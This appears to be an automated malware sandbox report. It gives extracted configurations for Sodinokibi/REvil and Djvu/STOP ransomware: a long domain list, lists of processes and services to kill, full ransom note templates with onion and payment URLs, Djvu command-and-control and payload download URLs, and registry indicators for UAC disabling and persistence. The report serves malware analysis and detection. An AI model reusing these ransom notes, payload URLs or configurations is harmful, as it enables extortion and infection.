brinkdoepke.eu
richardiv.com
scotlandsroute66.co.uk
arazi.eus
mrcar.nl
avtoboss163.ru:443
suonenjoen.fi
noda.com.ua
2020hindsight.info
xtensifi.com
achetrabalhos.com
iexpert99.com
jag.me
traitware.com
fskhjalmar.se
luvbec.com
bourchier.org
forextimes.ru
subquercy.fr
ledyoucan.com
pharmeko-group.com
site.markkit.com.br
khtrx.com
livelai.com
netadultere.fr
jdscenter.com
the5thquestion.com
tieronechic.com
sveneulberg.de
fidelitytitleoregon.com
skyscanner.ro
humanviruses.org
handyman-silkeborg.dk
carmel-york.com
brownswoodblog.com
wyreforest.net
5thactors.com
kickittickets.com
johnstonmingmanning.com
angelika-schwarz.com
k-zubki.ru
artcase.pl
allinonecampaign.com
atrgroup.it
eshop.design
mind2muscle.nl
omegamarbella.com
shrinkingplanet.com
martinipstudios.com
stabilisateur.fr
furland.ru
bertbutter.nl
blucamp.com
flossmoordental.com
leadforensics.com
eurethicsport.eu
hvitfeldt.dk
baikalflot.ru
o90.dk
primemarineengineering.com
jmmartinezilustrador.com
enactusnhlstenden.com
successcolony.com.ng
awag-blog.de
the-beauty-guides.com
mariajosediazdemera.com
afbudsrejserallinclusive.dk
pilotgreen.com
augen-praxisklinik-rostock.de
ijsselbeton.nl
adterium.com
bakingismyyoga.com
insane.agency
rhino-storage.co.uk
tbalp.co.uk
lunoluno.com
mustangmarketinggroup.com
cotton-avenue.co.il
ilveshistoria.com
karmeliterviertel.com
ocduiblog.com
agendatwentytwenty.com
stanleyqualitysystems.com
smartercashsystem.com
keuken-prijs.nl
mondolandscapes.com
entdoctor-durban.com
keyboardjournal.com
rossomattonecase.it
justaroundthecornerpetsit.com
look.academy
hoteltantra.com
duthler.nl
affligemsehondenschool.be
mesajjongeren.nl
nepal-pictures.com
jimprattmediations.com
cops4causes.org
alattekniksipil.com
bundan.com
mikegoodfellow.co.uk
hartofurniture.com
albcleaner.fr
fsbforsale.com
prometeyagro.com.ua
beauty-traveller.com
globalcompliancenews.com
glennverschueren.be
lmmont.sk
sunsolutions.es
bohrlochversicherung.info
haard-totaal.nl
epicjapanart.com
watchsale.biz
angeleyezstripclub.com
bg.szczecin.pl
tastevirginia.com
worldproskitour.com
billyoart.com
alnectus.com
turing.academy
ziliak.com
fta-media.com
randyabrown.com
christianscholz.de
letsstopsmoking.co.uk
ayudaespiritualtamara.com
carsten.sparen-it.de
renehartman.nl
concontactodirecto.com
fysiotherapierijnmond.nl
renderbox.ch
tatyanakopieva.ru
schroederschoembs.com
ufovidmag.com
alaskaremote.com
jalkapuu.net
creohn.de
grancanariaregional.com
qandmmusiccenter.com
rechtenplicht.be
centuryvisionglobal.com
11.in.ua
verbouwingsdouche.nl
eksperdanismanlik.com
towelroot.co
nexstagefinancial.com
gbk-tp1.de
birthplacemag.com
triplettagaite.fr
purepreprod4.com
druktemakersheerenveen.nl
onesynergyinternational.com
cc-experts.de
cssp-mediation.org
kdbrh.com
babysitting-hk.helpergo.co
jaaphoekzema.nl
gatlinburgcottage.com
theintellect.edu.pk
bodet150ans.com
koncept-m.ru
moira-cristescu.com
liverpoolabudhabi.ae
voetbalhoogeveen.nl
premiumweb.com.ua:443
oththukaruva.com
natturestaurante.com.br
tanatek.com
daveystownhouse.com
nepressurecleaning.com
zwemofficial.nl
tecleados.com
letterscan.de
kenmccallum.com
redpebblephotography.com
cardsandloyalty.com
alexwenzel.de
hawthornsretirement.co.uk
hostastay.com
antesacademy.it
groovedealers.ru
dierenambulancealkmaar.nl
lovcase.com
fi-institutionalfunds.com
sellthewrightway.com
bodymindchallenger.com
customroasts.com
eafx.pro
xn--ziinoapte-6ld.ro
gazelle-du-web.com
myfbateam.com
vdolg24.online
tweedekansenloket.nl
explora.nl
andermattswisswatches.ch
c-sprop.com
mediogiro.com.ar
kausette.com
palmecophilippines.com
brunoimmobilier.com
agriturismocastagneto.it
foerderverein-vatterschule.de
fascaonline.com
wallflowersandrakes.com
hospitalitytrainingsolutions.co.uk
endlessrealms.net
nutriwell.com.sg
hutchstyle.co.uk
tetameble.pl
ronaldhendriks.nl
legundschiess.de
sycamoregreenapts.com
der-stempelking.de
bjornvanvulpen.nl
rentsportsequip.com
terraflair.de
narca.net
rino-gmbh.com
solidhosting.nl
chorusconsulting.net
stralsund-ansichten.de
cascinarosa33.it
jobkiwi.com.ng
medicalsupportco.com
palmenhaus-erfurt.de
campusescalade.com
colored-shelves.com
baptistdistinctives.org
evsynthacademy.org
innovationgames-brabant.nl
teamsegeln.ch
espaciopolitica.com
larchwoodmarketing.com
skidpiping.de
xn--80abehgab4ak0ddz.xn--p1ai
nicksrock.com
ketomealprep.academy
hypogenforensic.com
sprintcoach.com
toranjtuition.org
loparnille.se
matteoruzzaofficial.com
stathmoulis.gr
denhaagfoodie.nl
quitescorting.com
hinotruckwreckers.com.au
biketruck.de
nbva.co.uk
alcye.com
irizar.com
jlwilsonbooks.com
rubyaudiology.com
guohedd.com
yournextshoes.com
tages-geldvergleich.de
annida.it
rozmata.com
craftron.com
grupoexin10.com
jandhpest.com
a-zpaperwork.eu
focuskontur.com
kiraribeaute-nani.com
cymru.futbol
sachainchiuk.com
anchelor.com
strauchs-wanderlust.info
jonnyhooley.com
parentsandkids.com
mediabolmong.com
grafikstudio-visuell.de
riffenmattgarage.ch
golfclublandgoednieuwkerk.nl
animation-pro.co.uk
eventosvirtualesexitosos.com
bluetenreich-brilon.de
welovecustomers.fr
gosouldeep.com
cap29010.it
silkeight.com
clemenfoto.dk
holocine.de
heuvelland-oaze.nl
aheadloftladders.co.uk
comoserescritor.com
brannbornfastigheter.se
mensemetgesigte.co.za
innersurrection.com
claudiakilian.de
alltagsrassismus-entknoten.de
belofloripa.be
mbuildinghomes.com
collegetennis.info
ncjc.ca
leansupremegarcinia.net
betterce.com
belinda.af
rename.kz
parksideseniorliving.net
azloans.com
napisat-pismo-gubernatoru.ru:443
floweringsun.org
nuohous.com
arearugcleaningnyc.com
finnergo.eu
ced-elec.com
vitoriaecoturismo.com.br
kelsigordon.com
utilisacteur.fr
mrkluttz.com
jax-interim-and-projectmanagement.com
global-migrate.com
pazarspor.org.tr
broccolisoep.nl
santastoy.store
marmarabasin.com
spacebel.be
mangimirossana.it
acornishstudio.co.uk
beandrivingschool.com.au
fotoeditores.com
midwestschool.org
mindfuelers.com
scholarquotes.com
jeanmonti.com
valiant-voice.com
skolaprome.eu
sytzedevries.com
catalyseurdetransformation.com
cl0nazepamblog.com
scietech.academy
condormobile.fr
schulz-moelln.de
reputation-medical.online
cac2040.com
masecologicos.com
nevadaruralhousingstudies.org
boyfriendsgoal.site
motocrossplace.co.uk
supercarhire.co.uk
leatherjees.com
levelseven.be
michaelfiegel.com
tradenavigator.ch
t3brothers.com
greenrider.nl
slotspinner.com
buerocenter-butzbach-werbemittel.de
docarefoundation.org
reygroup.pt
lattalvor.com
hensleymarketing.com
etgdogz.de
rarefoods.ro
frameshift.it
blavait.fr
manzel.tn
happycatering.de
palema.gr
pisofare.co
internalresults.com
thepixelfairy.com
soncini.ch
volta.plus
uncensoredhentaigif.com
bookingwheel.com
factoriareloj.com
mariannelemenestrel.com
slotenmakerszwijndrecht.nl
naukaip.ru
leopoldineroux.com
christopherhannan.com
abulanov.com
stringnosis.academy
electricianul.com
thisprettyhair.com
speakaudible.com
arthakapitalforvaltning.dk
metallbau-hartmann.eu
akwaba-safaris.com
adabible.org
rishigangoly.com
alene.co
axisoflove.org:443
spectamarketingdigital.com.br
catering.com
jefersonalessandro.com
dennisverschuur.com
kemtron.fr
galatee-couture.com
gsconcretecoatings.com
business-basic.de
bruut.online
bridalcave.com
zumrutkuyutemel.com
chris-anne.com
pokemonturkiye.com
reizenmetkinderen.be
computer-place.de
poems-for-the-soul.ch
rhino-turf.com
pajagus.fr
campinglaforetdetesse.com
expohomes.com
aquacheck.co.za
housesofwa.com
rapid5kloan.org
mieleshopping.it
fluzfluzrewards.com
piestar.com
precisetemp.com
dantreranch.com
forskolinslimeffect.net
hameghlim.com
ilovefullcircle.com
laylavalentine.com
smarttourism.academy
rizplakatjaya.com
thehovecounsellingpractice.co.uk
liepertgrafikweb.at
cainlaw-okc.com
theboardroomafrica.com
kosten-vochtbestrijding.be
uci-france.fr
trivselsguide.dk
perceptdecor.com
ya-elka.ru
kellengatton.com
bavovrienden.nl
drbenveniste.com
mediahub.co.nz
sjtpo.org
dcc-eu.com
inewsstar.com
nourella.com
cincinnatiphotocompany.org
memphishealthandwellness.com
descargandoprogramas.com
coachpreneuracademy.com
frankgoll.com
catchup-mag.com
sppdstats.com
burg-zelem.de
suitesartemis.gr
thegetawaycollective.com
5pointpt.com
klapanvent.ru
therapybusinessacademy.com
bubbalucious.com
deziplan.ru
activeterroristwarningcompany.com
acumenconsultingcompany.com
pinkxgayvideoawards.com
bulyginnikitav.000webhostapp.com
rolleepollee.com
myplaywin3.com
maxcube24.com.ua
3daywebs.com
juergenblaetz.de
lollachiro.com
markseymourphotography.co.uk
liveyourheartout.co
charlesfrancis.photos
craftstone.co.nz
salonlamar.nl
pro-gamer.pl
bcabattoirs.org
ronielyn.com
boloria.de
mamajenedesigns.com
dinedrinkdetroit.com
signededenroth.dk
chinowarehousespace.com
magrinya.net
morgansconsult.com
walterman.es
efficiencyconsulting.es
berdonllp.com
penumbuhrambutkeiskei.com
citiscapes-art.com
rentingwell.com
rtc24.com
baumfinancialservices.com
bayshoreelite.com
limmortelyouth.com
hotelturbo.de
marcandy.com
buonabitare.com
itheroes.dk
skooppi.fi
drbrianhweeks.com
go.labibini.ch
sambaglow.com
goddardleadership.org
gardenpartner.pl
karelinjames.com
hekecrm.com
fanuli.com.au
vvego.com
lesyeuxbleus.net
rsidesigns.com
hepishopping.com
husetsanitas.dk
happylublog.wordpress.com
premier-iowa.com
amorbellezaysalud.com
zinnystar.com
altocontatto.net
signamedia.de
zorgboerderijravensbosch.nl
donau-guides.eu
harleystreetspineclinic.com
block-optic.com
sweetz.fr
chatterchatterchatter.com
linkbuilding.life
lisa-poncon.fr
from02pro.com
altitudeboise.com
nauticmarine.dk
direitapernambuco.com
awaitspain.com
kryptos72.com
nginx.com
vedsegaard.dk
min-virksomhed.dk
thegrinningmanmusical.com
onlinetvgroup.com
kompresory-opravy.com
bd2fly.com
putzen-reinigen.com
kombi-dress.com
yvesdoin-aquarelles.fr
queertube.net
kamin-somnium.de
spartamovers.com
log-barn.co.uk
oscommunity.de
kroophold-sjaelland.dk
imagine-entertainment.com
muni.pe
ultimatelifesource.com
motocrosshideout.com
devplus.be
saint-malo-developpement.fr
circuit-diagramz.com
fixx-repair.com
fire-space.com
banksrl.co.za
metcalfe.ca
tzn.nu
amyandzac.com
ox-home.com
geoweb.software
b3b.ch
gavelmasters.com
barbaramcfadyenjewelry.com
jameswilliamspainting.com
basindentistry.com
mrmac.com
taulunkartano.fi
profibersan.com
speiserei-hannover.de
transifer.fr
agora-collectivites.com
singletonfinancial.com
g2mediainc.com
parseport.com
parisschool.ru
witraz.pl
relevantonline.eu
voice2biz.com
leloupblanc.gr
xn--80addfr4ahr.dp.ua
mazift.dk
fridakids.com
lumturo.academy
acibademmobil.com.tr
krishnabrawijaya.com
deduktia.fi
9nar.com
ravage-webzine.nl
matthieupetel.fr
campusce.com
domilivefurniture.com
acb-gruppe.ch
o2o-academy.com
maryairbnb.wordpress.com
boomerslivinglively.com
wribrazil.com
biodentify.ai
bluelakevision.com
carolynfriedlander.com
topvijesti.net
advance-refle.com
production-stills.co.uk
bluemarinefoundation.com
opt4cdi.com
cyberpromote.de
michal-s.co.il
glas-kuck.de
kartuindonesia.com
autoteamlast.de
brighthillgroup.com
stressreliefadvice.com
hm-com.com
four-ways.com
cleanroomequipment.ie
wg-heiligenstadt.de
bumbipdeco.site
energosbit-rp.ru
forumsittard.nl
sber-biznes.com
wademurray.com
jollity.hu
airvapourbarrier.com
triavlete.com
johnsonweekly.com
greeneyetattoo.com
mike.matthies.de
imaginekithomes.co.nz
laaisterplakky.nl
schlagbohrmaschinetests.com
graygreenbiomedservices.com
smartmind.net
futurenetworking.com
bychowo.pl
patassociation.com
artvark.nl
wordpress.idium.no
paradigmlandscape.com
spirello.nl
imajyuku-sozoku.com
bonitabeachassociation.com
solutionshosting.co.uk
bratek-immobilien.de
90nguyentuan.com
lgiwines.com
innervisions-id.com
bmw-i-pure-impulse.com
lifeinbreaths.com
mollymccarthydesign.com
andreaskildegaard.dk
placermonticello.com
curtsdiscountguns.com
goodboyscustom.com
linearete.com
oraweb.net
paardcentraal.nl
eos-horlogerie.com
azerbaycanas.com
enews-qca.com
fazagostar.co
secrets-clubs.co.uk
thiagoperez.com
jayfurnitureco.com
tilldeeke.de
saberconcrete.com
plbinsurance.com
blueridgeheritage.com
miscbo.it
osn.ro
landgoedspica.nl
p-ride.live
pureelements.nl
logosindustries.com
bilius.dk
jakubrybak.com
sharonalbrightdds.com
rvside.com
invela.dk
endstarvation.com
otpusk.zp.ua
skyboundnutrition.co.uk
zaczytana.com
specialtyhomeservicesllc.com
operativadigital.com
gurutechnologies.net
ludoil.it
apmollerpension.com
qrs-international.com
sshomme.com
lagschools.ng
proffteplo.com
vipcarrental.ae
vitormmcosta.com
protoplay.ca
yourcosmicbeing.com
funworx.de
janellrardon.com
livedeveloper.com
drvoip.com
diverfiestas.com.es
askstaffing.com
zdrowieszczecin.pl
fla.se
omnicademy.com
patriotcleaning.net
oexebusiness.com
akcadagofis.com
oro.ae
eatyoveges.com
almamidwifery.com
nxtstg.org
ikzoekgod.be
mgimalta.com
smartworkplaza.com
corporacionrr.com
skoczynski.eu
lapponiasafaris.com
muller.nl
hotjapaneselesbian.com
diakonie-weitramsdorf-sesslach.de
stitch-n-bitch.com
designimage.ae
frimec-international.es
bcmets.info
bajova.sk
mayprogulka.ru
xrresources.com
elex.is
pvandambv.nl
auberives-sur-vareze.fr
malzomattalar.com
orchardbrickwork.com
licensed-public-adjuster.com
brisbaneosteopathic.com.au
katherinealy.com
bendel-partner.de
limounie.com
biblica.com
apogeeconseils.fr
easydental.ae
encounter-p.net
dreamvoiceclub.org
dieetuniversiteit.nl
xn--billigafrgpatroner-stb.se
fitnessblenderstory.com
fbmagazine.ru
nationnewsroom.com
zealcon.ae
drnelsonpediatrics.com
crestgood.com
werkzeugtrolley.net
opticahubertruiz.com
oncarrot.com
awaisghauri.com
airserviceunlimited.com
metroton.ru
lashandbrowenvy.com
envomask.com
promus.ca
dentalcircle.com
mazzaropi.com.br
louiedager.com
die-immo-agentur.de
powershell.su
chatberlin.de
alpesiberie.com
alisodentalcare.com
thestudio.academy
satoblog.org
unboxtherapy.site
bagaholics.in
molinum.pt
testitjavertailut.net
slideevents.be
geitoniatonaggelon.gr
rivermusic.nl
advesa.com
mac-computer-support-hamburg.de
anleggsregisteret.no
skinkeeper.li
molade.nl
unexplored.gr
switch-made.com
mundo-pieces-auto.fr
dnqa.co.uk
iron-mine.ru
billscars.net
qwikcoach.com
ideamode.com
dogsunlimitedguide.com
asiaartgallery.jp
girlish.ae
sarahspics.co.uk
soundseeing.net
dinecorp.com
peppergreenfarmcatering.com.au
ramirezprono.com
stagefxinc.com
alharsunindo.com
studionumerik.fr
webforsites.com
dayenne-styling.nl
web865.com
wasnederland.nl
victorvictoria.com
avis.mantova.it
avisioninthedesert.com
internestdigital.com
aktivfriskcenter.se
hiddensee-buhne11.de
wineandgo.hu
dentallabor-luenen.de
factorywizuk.com
mursall.de
bescomedical.de
greatofficespaces.net
nykfdyrehospital.dk
richardkershawwines.co.za
globalskills.pt
professionetata.com
tothebackofthemoon.com
aberdeenartwalk.org
ncn.nl
benchbiz.com
neolaiamedispa.com
kookooo.com
topautoinsurers.net
techybash.com
whoopingcrane.com
onlinemarketingsurgery.co.uk
edrickennedymacfoy.com
delegationhub.com
pankiss.ru
sololibrerie.it
chainofhopeeurope.eu
tellthebell.website
lassocrm.com
apiarista.de
nrgvalue.com
nieuwsindeklas.be
billigeflybilletter.dk
smartspeak.com
chomiksy.net
mslp.org
subyard.com
julielusktherapy.com
ddmgen.com
amco.net.au
buzzneakers.com
kuriero.pro
cxcompany.com
wrinstitute.org
jobscore.com
mahikuchen.com
datatri.be
georgemuncey.com
fotoslubna.com
gaearoyals.com
thesilkroadny.com
so-sage.fr
the-cupboard.co.uk
theatre-embellie.fr
lexced.com
schluesseldienste-hannover.de
atma.nl
ninjaki.com
ebible.co
pxsrl.it
sochi-okna23.ru
fann.ru
yuanshenghotel.com
levencovka.ru
makingmillionaires.net
csaballoons.com
loysonbryan.com
casinodepositors.com
lsngroupe.com
mercadodelrio.com
modamarfil.com
pourlabretagne.bzh
egpu.fr
littlesaints.academy
phoenixcrane.com
citydogslife.com
animalfood-online.de
luvinsburger.fr
simpleitsolutions.ch
dmlcpa.com
rs-danmark.dk
universelle.fr
pixelhealth.net
alabamaroofingllc.com
physio-lang.de
malevannye.ru
framemyballs.com
ygallerysalonsoho.com:443
jobstomoveamerica.org
trainiumacademy.com
goeppinger-teppichreinigung.de
polynine.com
kvetymichalovce.sk
shortysspices.com
angelsmirrorus.com
kerstliedjeszingen.nl
hnkns.com
agencewho-aixenprovence.fr
m2graph.fr
kristianboennelykke.dk
hostingbangladesh.net
tramadolhealth.com
arabianmice.com
nalliasmali.net
startuplive.org
martha-frets-ceramics.nl
aceroprime.com
elitkeramika-shop.com.ua
lidkopingsnytt.nu
111firstdelray.com
istantidigitali.com
advanced-removals.co.uk
digitale-elite.de
1deals.com
mneti.ru
amelielecompte.wordpress.com
sbit.ag
galaniuklaw.com
circlecitydj.com
teethinadaydentalimplants.com
directique.com
heimdalbygg.no
mindsparkescape.com
shortsalemap.com
bringmehope.org
-
net
true
-
pid
37
-
prc
excel
winword
onenote
visio
powerpnt
dbeng50
isqlplussvc
mspub
mydesktopqos
mydesktopservice
vss
thunderbird
infopath
agntsvc
dbsnmp
wordpa
steam
synctime
firefox
oracle
sql
ocssd
msaccess
encsvc
tbirdconfig
outlook
sqbcoreservice
xfssvccon
ocomm
thebat
ocautoupds
-
ransom_oneliner
All of your files are encrypted! Find how to decrypt {EXT}-readme.txt and follow instuctions
-
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
-
sub
2794
-
svc
vss
svc$
backup
veeam
sophos
mepocs
memtas
sql
Extracted
C:\tmp\7w7o05f1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B5CDFEE7E980581
http://decryptor.cc/3B5CDFEE7E980581
Extracted
djvu
http://ring1.ug/As73yhsyU34578hxxx/SDf565g/get.php
http://ring2.ug/Asjdi435784ihjk65pen2/get.php
-
extension
.meka
-
offline_id
iToA4bsB4p1U6eP9sYfwett26TIoVaIjXvmekat1
-
payload_url
http://ring1.ug/files/cost/updatewin1.exe
http://ring1.ug/files/cost/updatewin2.exe
http://ring1.ug/files/cost/updatewin.exe
http://ring1.ug/files/cost/3.exe
http://ring1.ug/files/cost/4.exe
http://ring1.ug/files/cost/5.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-h159DSA7cz Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0178Asd374y5iuhld
Extracted
C:\SystemID\mk1ah-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3B5CDFEE7E980581
http://decryptor.top/3B5CDFEE7E980581
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023bc8-95.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Detected Djvu ransomware 2 IoCs
resource yara_rule behavioral1/memory/2864-1909-0x0000000000400000-0x0000000000C56000-memory.dmp family_djvu behavioral1/memory/1396-3159-0x0000000000400000-0x00000000009BD000-memory.dmp family_djvu -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Djvu family
-
GandCrab payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023c0d-285.dat family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe" lurwhzlcveb.exe -
Modifies firewall policy service 3 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List tpvpyme.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile tpvpyme.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications tpvpyme.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00378\\tpvpyme.exe" tpvpyme.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "2" tpvpyme.exe -
Nanocore family
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Smokeloader family
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sodinokibi family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ajhqekm.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (515) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (524) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Adds policy Run key to start application 2 TTPs 32 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "njuqrkzslgwouicdyyjf.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "gzhayoaqgyladofdv.exe" ajhqekm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "zryqncncriuikukh.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\mrl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "avfaasgyqkzqvibbvue.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = "czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\nvsans = 